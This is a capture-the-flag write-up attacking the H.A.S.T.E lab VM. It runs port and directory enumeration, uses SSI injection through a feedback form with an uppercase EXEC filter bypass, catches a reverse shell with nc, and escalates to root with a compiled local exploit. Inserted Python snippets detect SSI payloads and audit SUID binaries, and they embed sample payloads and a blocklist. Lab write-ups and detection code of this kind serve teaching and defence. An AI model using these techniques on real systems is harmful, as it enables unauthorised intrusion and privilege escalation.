HASTEVM target machine

Information gathering

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.150
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:28 EDT
Nmap scan report for 192.1.1.150
Host is up (0.0023s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:B3:82:58 (VMware)

Only port 80 is open in the TCP scan. UDP scan result, then service and version detection on port 80:

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap -sT -sV -sC -O -p80 192.1.1.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:39 EDT
Nmap scan report for 192.1.1.150
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: H.A.S.T.E
| http-robots.txt: 1 disallowed entry
|_/spukcab
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:B3:82:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds

robots.txt was found.

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nmap --script=vuln -p80 192.1.1.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:39 EDT
Nmap scan report for 192.1.1.150
Host is up (0.00028s latency).

PORT STATE SERVICE
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-stored-xss:
| Found the following stored XSS vulnerabilities:
|
| Payload: ghz>hzx
| Uploaded on: http://192.1.1.150:80/receipt.php
|_ Description: Unfiltered '>' (greater than sign). An indication of potential XSS vulnerability.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.150
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.1.1.150:80/
| Form id:
| Form action: receipt.php
|
| Path: http://192.1.1.150:80/layout/scripts/jquery.mobilemenu.js
| Form id:
| Form action: #
|
| Path: http://192.1.1.150:80/index.php
| Form id:
|_ Form action: receipt.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-enum:
| /robots.txt: Robots file
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /pages/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
MAC Address: 00:0C:29:B3:82:58 (VMware)

Found robots.txt, plus the images and pages directories.

Directory brute-forcing

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo gobuster dir -u http://192.1.1.150/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,sql,tar,php
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.150/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: sql,tar,php,txt,html
[+] Timeout: 10s
===============================================================
2023/09/14 03:35:37 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 290]
/index (Status: 200) [Size: 35]
/images (Status: 301) [Size: 311] [--> http://192.1.1.150/images/]
/index.php (Status: 200) [Size: 6851]
/.html (Status: 403) [Size: 291]
/pages (Status: 301) [Size: 310] [--> http://192.1.1.150/pages/]
/layout (Status: 301) [Size: 311] [--> http://192.1.1.150/layout/]
/robots (Status: 200) [Size: 33]
/robots.txt (Status: 200) [Size: 33]
/ssi (Status: 200) [Size: 579]
/licence.txt (Status: 200) [Size: 5004]
/licence (Status: 200) [Size: 5004]
/.html (Status: 403) [Size: 291]
/.php (Status: 403) [Size: 290]
/server-status (Status: 403) [Size: 299]
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 542]
/receipt (Status: 200) [Size: 2588]
/receipt.php (Status: 302) [Size: 1] [--> receipt.shtml]
Progress: 7640310 / 7643004 (99.96%)
===============================================================
2023/09/14 04:00:35 Finished
===============================================================

Started going through each path. index is a strange string; noted it down for now.

Nothing of interest in images.

Nothing in pages either.

Nothing in layout either.

robots.txt

User-agent: *
Disallow: /spukcab

Looking at /spukcab

After downloading the file locally, nothing of value was found in it apart from a file path.

The ssi path looked odd; a quick search suggested that SSI may be injectable:

SSI — Server Side Include Injection | by Vikas Sharma | Medium

WSTG - v4.1 | OWASP Foundation

SSI injection

SSI still needs an input point, though. Based on the article above, the guess was that the default page has a form.

Capture the request with Burp.

The submitted content is reflected in the response, so it may well be parsed there.

The PoC from the article above was tried first, but it did not give a satisfactory result.

A walkthrough showed that the PoC here needs exec written in uppercase.

This is a simple bypass: server-side commands like this are usually filtered, so a bypass mindset is needed, and changing case is one of the more common tricks.

And the injection point is the feedback field.
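The uppercase trick above works because the filter in front of the feedback form is case-sensitive while mod_include is not. The following is an added example (not code from the writeup or from the target) showing how a defender would check feedback-form bodies or access-log payloads for SSI directives in a case-insensitive way, with the naive check beside it so the gap is visible. The sample submissions are constructed for illustration.

```python
import re

# Apache mod_include syntax: <!--#directive attr="value" ... -->
# re.IGNORECASE is the whole point: a check for the literal "<!--#exec"
# never sees "<!--#EXEC cmd=...-->", which the server still evaluates.
SSI_DIRECTIVE = re.compile(
    r"<!--#(?P<name>[a-z]+)\b(?P<attrs>[^>]*?)-->",
    re.IGNORECASE | re.DOTALL,
)

# Directives that run commands or read files on the server.
HIGH_RISK = {"exec", "include", "fsize", "flastmod"}


def find_ssi_directives(text):
    """Return [(directive_name_lowercased, attribute_string), ...] found in text."""
    return [
        (m.group("name").lower(), m.group("attrs").strip())
        for m in SSI_DIRECTIVE.finditer(text)
    ]


def classify(text):
    """'clean' (no SSI), 'low' (echo/config/set/...), or 'high' (exec/include/...)."""
    names = [name for name, _ in find_ssi_directives(text)]
    if not names:
        return "clean"
    return "high" if any(n in HIGH_RISK for n in names) else "low"


def naive_filter(text):
    """A case-sensitive blocklist, the kind of check the uppercase variant slips past."""
    return "<!--#exec" in text


def scan_submissions(submissions):
    """Run both checks over a batch of feedback-form bodies; one row per submission."""
    return [
        {"index": i, "verdict": classify(body), "naive_blocked": naive_filter(body)}
        for i, body in enumerate(submissions)
    ]


# Constructed sample form bodies (not captured from the target); the last two
# are the lowercase and uppercase variants of the directive the writeup describes.
SAMPLE_SUBMISSIONS = [
    "Great site, thanks!",
    '<!--#echo var="DATE_LOCAL" -->',
    '<!--#exec cmd="id" -->',
    '<!--#EXEC cmd="id" -->',
]

if __name__ == "__main__":
    for row in scan_submissions(SAMPLE_SUBMISSIONS):
        print(row)
```

Detection is the second line of defence; the fix is to never place raw user input into a page that mod_include parses (HTML-encode it first, so `<!--#` cannot survive), and to set `Options IncludesNOEXEC` rather than `Includes` on the directory, which disables the exec directive entirely.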

Reverse shell

The ls output confirmed that this is the web root. The next step was a reverse shell, but the nc, python and sh variants all failed, so the only option left was to download a file into the web root and open that PHP file in the browser; the reverse shell came back.

┌──(kali㉿kali)-[~/Downloads/HASTEVM]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.150] 39338
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
02:03:33 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:b3:82:58 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.150/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1546sec preferred_lft 1546sec
inet6 fe80::5600:6317:eab4:21f7/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ConverterPlus:/$ sudo -l
sudo -l
[sudo] password for www-data

Privilege escalation

Look at the user's home directory

www-data@ConverterPlus:/home/starfire$ ls -alih
ls -alih
total 124K
407181 drwxr-xr-x 17 starfire starfire 4.0K Sep 11 2017 .
393217 drwxr-xr-x 3 root root 4.0K Sep 9 2017 ..
398369 -rw------- 1 starfire starfire 692 Sep 11 2017 .ICEauthority
393246 -rw------- 1 starfire starfire 58 Sep 11 2017 .Xauthority
393335 -rw------- 1 starfire starfire 9.3K Sep 11 2017 .bash_history
408224 -rw-r--r-- 1 starfire starfire 220 Sep 9 2017 .bash_logout
408222 -rw-r--r-- 1 starfire starfire 3.7K Sep 9 2017 .bashrc
393237 drwx------ 11 starfire starfire 4.0K Sep 11 2017 .cache
393322 drwx------ 14 starfire starfire 4.0K Sep 9 2017 .config
393240 -rw-r--r-- 1 starfire starfire 25 Sep 9 2017 .dmrc
398371 drwx------ 2 starfire starfire 4.0K Sep 9 2017 .gconf
393359 drwx------ 3 starfire starfire 4.0K Sep 11 2017 .gnupg
393331 drwx------ 3 starfire starfire 4.0K Sep 9 2017 .local
549568 drwx------ 4 starfire starfire 4.0K Sep 11 2017 .mozilla
548637 drwxrwxr-x 2 starfire starfire 4.0K Sep 10 2017 .nano
408223 -rw-r--r-- 1 starfire starfire 655 Sep 9 2017 .profile
398482 -rw-r--r-- 1 starfire starfire 0 Sep 9 2017 .sudo_as_admin_successful
393432 -rw------- 1 starfire starfire 1.4K Sep 11 2017 .xsession-errors
393247 -rw------- 1 starfire starfire 1.5K Sep 11 2017 .xsession-errors.old
393260 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Desktop
393318 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Documents
393308 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Downloads
393319 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Music
393320 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Pictures
393317 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Public
393316 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Templates
393321 drwxr-xr-x 2 starfire starfire 4.0K Sep 9 2017 Videos
407182 -rw-r--r-- 1 starfire starfire 8.8K Sep 9 2017 examples.desktop

Opened each of the folders; nothing useful. Next, look at SUID files.

www-data@ConverterPlus:/home/starfire$ find / -type f -perm -04000 -ls 2>/dev/null
<e/starfire$ find / -type f -perm -04000 -ls 2>/dev/null
131128 32 -rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
131203 44 -rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
131249 28 -rwsr-xr-x 1 root root 26492 Jun 14 2017 /bin/umount
131202 40 -rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
131229 40 -rwsr-xr-x 1 root root 38900 May 16 2017 /bin/su
131165 36 -rwsr-xr-x 1 root root 34812 Jun 14 2017 /bin/mount
263148 36 -rwsr-xr-x 1 root root 34680 May 16 2017 /usr/bin/newgrp
266140 12 -rwsr-xr-x 1 root root 9808 Feb 9 2017 /usr/bin/vmware-user-suid-wrapper
263617 160 -rwsr-xr-x 1 root root 159852 Jan 20 2021 /usr/bin/sudo
262396 40 -rwsr-xr-x 1 root root 39560 May 16 2017 /usr/bin/chsh
263211 52 -rwsr-xr-x 1 root root 53128 May 16 2017 /usr/bin/passwd
273342 20 -rwsr-xr-x 1 root root 18216 Mar 27 2019 /usr/bin/pkexec
262394 48 -rwsr-xr-x 1 root root 48264 May 16 2017 /usr/bin/chfn
262716 80 -rwsr-xr-x 1 root root 78012 May 16 2017 /usr/bin/gpasswd
263160 388 -rwsr-xr-- 1 root dip 396068 Jul 23 2020 /usr/sbin/pppd
273254 504 -rwsr-xr-x 1 root root 513528 Mar 4 2019 /usr/lib/openssh/ssh-keysign
266928 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
271337 16 -rwsr-xr-x 1 root root 13840 Mar 17 2017 /usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
268960 16 -rwsr-xr-x 1 root root 13960 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
264433 48 -rwsr-xr-- 1 root messagebus 46436 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
262623 12 -rwsr-sr-x 1 root root 9772 Apr 8 2021 /usr/lib/xorg/Xorg.wrap
272845 120 -rwsr-xr-x 1 root root 121420 Feb 7 2021 /usr/lib/snapd/snap-confine

No surprises among the SUID files; check the scheduled tasks.

www-data@ConverterPlus:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Check the permissions of sensitive files

www-data@ConverterPlus:/tmp$ ls -alih /etc/passwd /etc/shadow /etc/crontab
ls -alih /etc/passwd /etc/shadow /etc/crontab
786579 -rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
812110 -rw-r--r-- 1 root root 2.2K Sep 9 2017 /etc/passwd
809674 -rw-r----- 1 root shadow 1.3K Sep 11 2017 /etc/shadow

Nothing gained so far.
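The three checks above (SUID inventory, crontab, sensitive-file modes) are exactly what a host-audit job should run on a schedule so that a stray setuid binary is noticed by the owner before anyone else. As an added example (not code from the writeup), here is a small parser for the `find / -type f -perm -04000 -ls` output shown above that compares it against a baseline and flags entries worth a look. The baseline set and the last two sample lines are constructed assumptions: `/usr/lib/xorg/Xorg.wrap` is the real setuid+setgid file from the listing, `/usr/local/bin/backup` is a made-up world-writable setuid binary added to show what a finding looks like.

```python
from dataclasses import dataclass

# Constructed sample: a few lines from the writeup's find output (the shell echo
# line included, to show it is skipped) plus two entries added for illustration.
SAMPLE_FIND_OUTPUT = """\
www-data@ConverterPlus:/home/starfire$ find / -type f -perm -04000 -ls 2>/dev/null
131128 32 -rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
131202 40 -rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
131229 40 -rwsr-xr-x 1 root root 38900 May 16 2017 /bin/su
263617 160 -rwsr-xr-x 1 root root 159852 Jan 20 2021 /usr/bin/sudo
263211 52 -rwsr-xr-x 1 root root 53128 May 16 2017 /usr/bin/passwd
273342 20 -rwsr-xr-x 1 root root 18216 Mar 27 2019 /usr/bin/pkexec
262623 12 -rwsr-sr-x 1 root root 9772 Apr 8 2021 /usr/lib/xorg/Xorg.wrap
999999 16 -rwsrwxrwx 1 root root 14208 Sep 1 2023 /usr/local/bin/backup
"""

# Placeholder baseline (an assumption, not the distribution's real list).
# In practice, generate it from a known-good image of the same release.
EXPECTED_SUID = {
    "/bin/fusermount", "/bin/ping", "/bin/su",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/pkexec",
}


@dataclass
class SuidEntry:
    perms: str
    owner: str
    group: str
    size: int
    path: str


def parse_find_ls(output):
    """Parse `find ... -ls` lines: inode blocks perms links owner group size mon day year path."""
    entries = []
    for line in output.splitlines():
        fields = line.split()
        # skip prompts, command echoes and anything without a regular-file mode string
        if len(fields) < 11 or not fields[2].startswith("-"):
            continue
        entries.append(SuidEntry(
            perms=fields[2], owner=fields[4], group=fields[5],
            size=int(fields[6]), path=" ".join(fields[10:]),
        ))
    return entries


def audit_suid(entries, baseline):
    """Return (reason, path) findings; an empty list means nothing needs a second look."""
    findings = []
    for e in entries:
        if e.path not in baseline:
            findings.append(("not-in-baseline", e.path))
        # mode string layout: [0] type, [1-3] user rwx, [4-6] group rwx, [7-9] other rwx
        if e.perms[5] == "w" or e.perms[8] == "w":
            # a writable setuid file can be replaced by anyone with write access
            findings.append(("writable-suid", e.path))
        if e.perms[6] in "sS":
            findings.append(("setuid-and-setgid", e.path))
    return findings


if __name__ == "__main__":
    for reason, path in audit_suid(parse_find_ls(SAMPLE_FIND_OUTPUT), EXPECTED_SUID):
        print(f"{reason:20} {path}")
```

Run against the listing in the writeup with a baseline built from a clean Ubuntu 16.04 image, the "not-in-baseline" rule is what surfaces third-party additions; the file dates on `sudo` and `pkexec` in the listing are what a patch-status check would compare against the current package versions.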

Kernel privilege escalation

Try kernel privilege escalation

Tried these two; both failed, so the fallback was to run linpeas and collect information.

Search for an exploit based on the reported CVE

Download the three files to the target one by one

www-data@ConverterPlus:/tmp$ make
make
gcc -shared -o evil.so -fPIC evil-so.c
evil-so.c: In function 'gconv_init':
evil-so.c:10:5: warning: implicit declaration of function 'setgroups' [-Wimplicit-function-declaration]
setgroups(0);
^
evil-so.c:12:5: warning: null argument where non-null required (argument 2) [-Wnonnull]
execve("/bin/sh", NULL, NULL);
^
gcc exploit.c -o exploit
exploit.c: In function 'main':
exploit.c:25:5: warning: implicit declaration of function 'execve' [-Wimplicit-function-declaration]
execve(BIN, argv, envp);
www-data@ConverterPlus:/tmp$ ./exploit
./exploit
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:b3:82:58 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.150/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1479sec preferred_lft 1479sec
inet6 fe80::5600:6317:eab4:21f7/64 scope link
valid_lft forever preferred_lft forever
# uname -a
uname -a
Linux ConverterPlus 4.15.0-142-generic #146~16.04.1-Ubuntu SMP Tue Apr 13 09:26:57 UTC 2021 i686 athlon i686 GNU/Linux
# cd /root
cd /root
# ls
ls
# ls -liah
ls -liah
total 32K
262146 drwx------ 5 root root 4.0K Sep 11 2017 .
2 drwxr-xr-x 23 root root 4.0K Sep 12 06:51 ..
268875 -rw------- 1 root root 5 Sep 11 2017 .bash_history
262239 -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
262238 drwx------ 2 root root 4.0K Aug 1 2017 .cache
548735 drwx------ 3 root root 4.0K Sep 11 2017 .gnupg
548793 drwxr-xr-x 2 root root 4.0K Sep 9 2017 .nano
262240 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile

Done.

Supplementary notes on the privilege escalation question: H.A.S.T.E: 1 pentest record | various write-ups (reigniting.github.io)


Source: https://i3eg1nner.github.io/2023/09/64870b3c7ab9.html
Author: I3eg1nner
Published: 14 September 2023